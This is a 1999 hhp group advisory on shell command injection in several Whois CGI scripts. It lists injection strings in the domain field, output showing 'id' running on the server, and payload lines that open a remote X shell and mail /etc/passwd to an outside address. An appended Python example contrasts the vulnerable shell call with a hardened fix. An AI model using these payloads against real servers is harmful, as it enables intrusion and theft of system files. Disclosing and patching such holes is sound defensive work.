(hhp) Whois.CGI - ADVISORY. (hhp)
hhp-ADV#12
11/9/99 8:42:57pm CST
By: loophole
hhp@hhp.perlx.com - http://hhp.perlx.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
What?:
Command-execution hole in several known (and probably some unknown) Whois CGI packages.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Versions?:
1.) Whois Internic Lookup - version: 1.0
2.) CC Whois - Version: 1.0
3.) Matt's Whois - Version: 1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit!:
These versions allow execution of arbitrary commands on the web server, because the
domain field from the form is handed to a shell without any parsing or filtering of
shell metacharacters (';', '"', '|' and friends). Entering one of the following
strings as the domain is enough:
Note: (Strings will vary for different vulnerable versions; which one works depends on
how the script quotes the domain when it builds the whois command line.)
1.) ;commands
2.) ";commands
3.) ;commands;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Example!:
If the domain entry consists of:
1.) ;id
2.) ";id
or
3.) ;id;
you will see something like this:
'Whois Server Version 1.1
Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
etc. etc. etc....
(scroll to the bottom of the output.)
uid=501(blah) gid=500(blah)'
^^^^^
'id' was executed on the server, as whatever user the CGI runs as.
Other commands can be run the same way:
;xterm -display ip:0.0 -rv -e /bin/sh
";uname -a;whoami;w;ls -al
;cat /etc/passwd|mail you@yourdomain.com;
Etc, Etc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Foo!:
A lot of main *NIC* servers were found running vulnerable versions. I am in the
process of contacting the main servers, and the software programmers, to advise
them of the vulnerability. Very well known/used sites are vulnerable (which will
remain nameless for security reasons). I tried to get in contact with them, but
being such a big company/service, I failed, so sad indeed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fix?:
If you run one of these bad scripts, delete it and point your browser to:
http://cgi.resourceindex.com/Programs_and_Scripts/Perl/Internet_Utilities/Whois/
and download one of the secure packages.
If you would rather patch your own copy: check the domain field against a strict
allowlist (letters, digits, '-' and '.' only, in hostname form) and run whois
without going through a shell (Perl's list-form system()/exec(), or open() with
'-|'), instead of interpolating the field into a backtick or system() string.
Merely wrapping the field in quotes is not a fix on its own; the '";commands'
string above exists precisely because a '"' in the input closes the quote the
script opened.
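To make the three payload shapes and the fix concrete, here is an added example in Python (not code from the advisory or from any of the packages it names, which are Perl). It assumes the vulnerable scripts do the equivalent of a Perl backtick call, `$out = \`whois $domain\`;`, either bare or with the field wrapped in double quotes; that is an assumption about their shape, not something the advisory shows. The `whois` client is replaced by a stand-in command (`echo lookup ...`) so the example runs offline; the shell-injection mechanism is unchanged.

```python
"""Shell-metacharacter injection through a whois CGI front end.

Added example, not code from the advisory or from any of the packages it
names. The whois client is replaced by a harmless stand-in ('echo lookup ...')
so that the example runs offline; the injection mechanism is unchanged.
"""
import re
import shlex
import subprocess

# Assumption: stand-in for the real 'whois' binary so no network is needed.
WHOIS_STUB = "echo lookup"


def vulnerable_lookup(domain: str) -> str:
    """The flawed pattern: the CGI field interpolated into a shell string.

    Assumed Perl equivalent: $out = `whois $domain`;  /bin/sh then treats
    ';', '|', '`' ... inside $domain as command syntax, so ';id' runs id.
    """
    cmd = f"{WHOIS_STUB} {domain}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def quoted_lookup(domain: str) -> str:
    """Same flaw with the field wrapped in double quotes (`whois "$domain"`).

    This stops the bare ';commands' string but not one that starts with '"',
    which closes the quote the script opened (the advisory's '";commands').
    """
    cmd = f'{WHOIS_STUB} "{domain}"'
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Allowlist: dotted hostname labels of letters, digits and hyphens, plus an
# alphabetic TLD. Anything else (spaces, quotes, ';', '|', '&', '$') is rejected.
DOMAIN_RE = re.compile(
    r"(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}"
)


def is_valid_domain(domain: str) -> bool:
    """True only for a plain hostname; any shell metacharacter fails the match."""
    return DOMAIN_RE.fullmatch(domain) is not None


def safe_lookup(domain: str) -> str:
    """Hardened form: allowlist-validate, then exec with an argv list (no shell)."""
    if not is_valid_domain(domain):
        raise ValueError(f"rejected domain field: {domain!r}")
    # With a real client this is simply ["whois", domain]; no shell ever sees it.
    argv = shlex.split(WHOIS_STUB) + [domain]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Constructed inputs: a real domain, the bare ';' form, and the '"' form.
    for payload in ["example.com", "; echo INJECTED", '"; echo INJECTED; echo "']:
        print(f"--- field: {payload!r}")
        print("unquoted :", vulnerable_lookup(payload).rstrip())
        print("quoted   :", quoted_lookup(payload).rstrip())
        try:
            print("hardened :", safe_lookup(payload).rstrip())
        except ValueError as e:
            print("hardened :", e)
```

Running it shows `INJECTED` appearing as its own output line for the bare `;` payload against the unquoted form, and for the `"`-prefixed payload against the quoted form, while the hardened function rejects both before anything is executed. The point is that the fix is the pair of measures together: an allowlist on the field and an argv-style call that never passes through `/bin/sh`; neither quoting nor a blocklist of individual characters is sufficient.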
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shouts to all of hhp.
Fuck you to gH for trying to rip this ADV before I could release it.
---hhp-2t0--------------------------------